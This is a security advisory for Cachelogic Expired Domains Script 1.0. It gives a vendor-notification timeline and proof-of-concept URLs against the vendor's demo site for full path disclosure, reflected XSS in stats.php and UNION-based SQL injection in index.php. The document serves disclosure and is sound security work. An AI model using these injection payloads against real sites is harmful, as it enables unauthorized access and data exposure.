Cachelogic Expired Domains Script 1.0 multiple security vulnerabilities

There are multiple security vulnerabilities in Cachelogic Expired Domains Script 1.0 which may allow a remote attacker to take control of the software.

Software

Software Link: Expired Domains Script 1.0

Vulnerable Version: <= 1.0

Vendor Notification:

# 2011-03-20 # Notified vendor CacheLogic.net

# 2011-03-20 # Vendor reply: confirmed

# 2011-03-20 # Additional details provided

# 2011-03-24 # Vendor released patch

Vulnerabilities

# Information Disclosure # Full Path Disclosure # <= 1.0 # Patched

The following proof of concept is available:

http://cachelogic.net/demo/index.php?page[]
http://cachelogic.net/demo/index.php?domain[]
http://cachelogic.net/demo/index.php?ext[]
http://cachelogic.net/demo/index.php?filter[]
http://cachelogic.net/demo/index.php?hyphen[]
http://cachelogic.net/demo/index.php?numbers[]
http://cachelogic.net/demo/index.php?ncharacter[]
http://cachelogic.net/demo/index.php?ncharacter='
http://cachelogic.net/demo/index.php?searchdays[]
http://cachelogic.net/demo/index.php?action[]

# Reflected Cross-Site Scripting (XSS) # <= 1.0 # Patched

The vulnerabilities are due to failure in "stats.php" to properly sanitize user-supplied data in the "name" and "ext" parameters.

The following proof of concept is available:

http://cachelogic.net/demo/stats.php?name="><script>alert(1)</script><p+"
http://cachelogic.net/demo/stats.php?ext="><script>alert(1)</script><p+"

# SQL Injection # <= 1.0 # Patched

The vulnerability is due to failure in "index.php" to properly sanitize user- supplied data in the "ncharacter" parameter.

The following proof of concept is available:

http://cachelogic.net/demo/index.php?ncharacter=-1+union+select+@@version,null,null--

Reference

# OWASP: Cross-Site Scripting

# OWASP: Full Path Disclosure

# OWASP: SQL Injection

Appendix

[TXT] Cachelogic Expired Domains Script 1.0 multiple security vulnerabilities